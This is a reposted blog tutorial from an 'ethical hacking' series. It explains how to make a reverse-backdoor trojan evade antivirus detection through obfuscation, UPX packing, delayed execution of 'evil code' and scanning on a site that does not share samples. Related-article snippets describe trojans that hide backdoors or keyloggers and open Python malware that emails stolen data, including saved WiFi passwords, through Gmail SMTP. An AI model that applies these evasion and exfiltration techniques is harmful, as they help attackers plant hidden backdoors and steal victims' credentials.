Python Ethical Hacking - TROJANS Analysis(3)

BYPASSING ANTI-VIRUS PROGRAMS

AV programs detect viruses based on:

1. Code - compare files to huge databases of signatures.

->Use own code, obfuscation, useless operations, encode, pack ...etc

2. Behaviour - run a file in a sandbox and analyze it.

-> Run trusted operations before evil code.

->Delay execution of evil code.

Scan the file on the following website:

NoDistribute - Online Virus Scanner Without Result Distribution

https://nodistribute.com/

Using UPX to Package the executable program.

https://upx.github.io/

Download the file from https://github.com/upx/upx/releases/download/v3.95/upx-3.95-amd64_linux.tar.xz.

And extract to the /opt folder.

Compress the evil file through UPX.

./upx /root/PycharmProjects/reverse_backdoor/dist/reverse_backdoor.exe -o compressed_backdoor.exe

Scan the compressed_backdoor.exe file, the result is a little better.

 Take your file Unique and delay to execute the evil code to let the AV program think your program is harmless.

原文地址:https://www.cnblogs.com/keepmoving1113/p/11666866.html

时间: 2024-10-05 00:40:56

Python Ethical Hacking - TROJANS Analysis(3)的相关文章

Python Ethical Hacking - TROJANS Analysis(1)

TROJANS A trojan is a file that looks and functions as a normal file(image, pdf, song ..etc). When executed: 1. Opens the normal file that the user expects. 2. Executes evil code in the background (run a backdoor/keylogger ..etc). Download & Execute

Python Ethical Hacking - TROJANS Analysis(4)

Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable -  adding the

Python Ethical Hacking - Malware Analysis(2)

Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import re def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) server.se

Python Ethical Hacking - Malware Analysis(3)

Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess import re def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) ser

Python Ethical Hacking - Malware Analysis(4)

DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. Simple but powerfull. Can be used in many situations: download _file + execute_command = download_and_execute download_file + execute_and_report = do

Python Ethical Hacking - BACKDOORS(8)

Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specific resources. Result: They work on any OS with a python interpreter. If packaged, they will work on any OS if even if python is NOT installed. 原文地址:htt

Python Ethical Hacking - Basic Concetion

What is Hacking? Gaining unauthorized access. Hackers? 1.Black-hat Hackers 2.White-hat Hackers 3.Grey-hat Hackers WHAT IS A PROGRAM? A set of instructions to do a certain task or solve a problem. 原文地址:https://www.cnblogs.com/keepmoving1113/p/11332855

Python Ethical Hacking - Intercepting and Modifying Packets

INTERCEPTING & MODIFYING PACKETS Scapy can be used to: Create packets. Analyze packets. Send/receive packets. But it can't be used to intercept packets/flows. CLASSIC MITM SCENARIO  MITM - SNIFFING DATA  MITM - MODIFYING DATA 1. Execute the command -

Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)

Refactoring and Housekeeping: #!/usr/bin/env python import re from netfilterqueue import NetfilterQueue from scapy.layers.inet import TCP, IP from scapy.packet import Raw def set_load(packet, load): packet[Raw].load = load del packet[IP].len del pack